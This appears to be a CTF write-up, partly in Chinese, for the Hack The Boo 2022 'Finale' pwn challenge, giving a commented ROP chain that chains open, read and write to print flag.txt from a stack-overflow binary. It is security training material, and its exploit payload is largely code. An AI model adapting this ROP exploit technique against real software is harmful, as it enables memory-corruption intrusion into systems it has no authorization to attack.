# Hack The Boo 2022 /Finale
###### tags: `CTF`,`PWN`,`writeup`
檔案連結:http://gofile.me/6lhQ2/Xy7LIzLt7
![](https://i.imgur.com/FtqsDMS.png)
沒有canary跟PIE其實對題目沒影響,出題者是個好老師,每一題都很明確
題目說明得很清楚,用的是非公版libc,意思就是要你乖乖用rop,出題者很好心的幫你備齊了open、read、write,來複習一下
![](https://i.imgur.com/pNyUBA3.png)
```
# ROP chain for the "finale" binary: open("flag.txt") -> read(fd, buf, 0x20) -> write(1, buf, 0x20).
# The write-up above says the libc is non-public, so the chain uses only gadgets and the
# three functions (open/read/write) already present in the binary.
# Names not defined in this snippet come from the surrounding script: p64 and elf1 are
# presumably pwntools' p64()/ELF(); rsp must be the address of the START of this buffer,
# because rsp+8*29 == 64 + 21*8 lands exactly on the "flag.txt" bytes appended at the end.
pop_rdi = 0x00000000004012d6 # pop rdi; ret;
pop_rsi = 0x00000000004012d8 # pop rsi; ret;
# adc edx, dword ptr [rbp + 0x48]; mov ebp, esp; call 0x1230; mov byte ptr [rip + 0x2d6b], 1; pop rbp; ret;
# Used as a stand-in for a missing "pop rdx" gadget: edx is set via memory relative to rbp.
adc_rdx = 0x00000000004012ac
pop_rbp = 0x00000000004012bd # pop rbp; ret;

# 64-byte overflow buffer. Its first dword is 0x20, which the adc gadget below adds into edx;
# that edx then serves as the byte count for both read() and write()
# (assumes edx is 0 when the gadget runs, i.e. after open() — not verified here).
payload = b"\x20".ljust(64, b"\x00")
payload += p64(rsp)                  # overwrites the saved rbp slot (presumably: 64-byte buffer + 8 before the return address)
payload += p64(pop_rdi)
payload += p64(rsp+8*29)             # rdi = pointer to "flag.txt" (64 + 21*8 == 8*29 bytes into this payload)
payload += p64(pop_rsi)
payload += p64(0)                    # rsi = flags = 0 (O_RDONLY)
payload += p64(elf1.symbols["open"]) # call open("flag.txt", O_RDONLY)
payload += p64(pop_rbp)
payload += p64(rsp-0x48)             # rbp = rsp-0x48 so the gadget's [rbp+0x48] resolves to [rsp], the 0x20 at the buffer start
# adc edx, [rbp+0x48]: adds 0x20 into edx. (The original comment said rbp-0x40; the gadget
# disassembly above reads rbp+0x48.) The gadget's mov ebp,esp / call 0x1230 side effects are
# not visible here — confirm they leave rdx intact before read() is reached.
payload += p64(adc_rdx)
payload += p64(rsp+0x100)            # consumed by the gadget's trailing "pop rbp"; keeps rbp pointing into the stack
payload += p64(pop_rdi)
payload += p64(3)                    # fd: assumes open() returned 3 (lowest free descriptor) — not checked
payload += p64(pop_rsi)
payload += p64(rsp)                  # buf = start of this buffer
payload += p64(elf1.symbols["read"]) # call read(3, buf, rdx) with rdx == 0x20 from the gadget
payload += p64(pop_rdi)
payload += p64(1)                    # fd 1 = stdout
payload += p64(pop_rsi)
payload += p64(rsp)                  # buf = same buffer the flag was read into
payload += p64(elf1.symbols["write"]) # call write(1, buf, 0x20) — rdx is still 0x20 if read() did not change it
payload += p64(elf1.symbols["finale"]) # return into finale (presumably the vulnerable function) after write — verify
payload += b"flag.txt"               # exactly 8 bytes, so it occupies one p64-sized slot at rsp+8*29
payload += p64(0)                    # NUL-terminates "flag.txt" for open()
```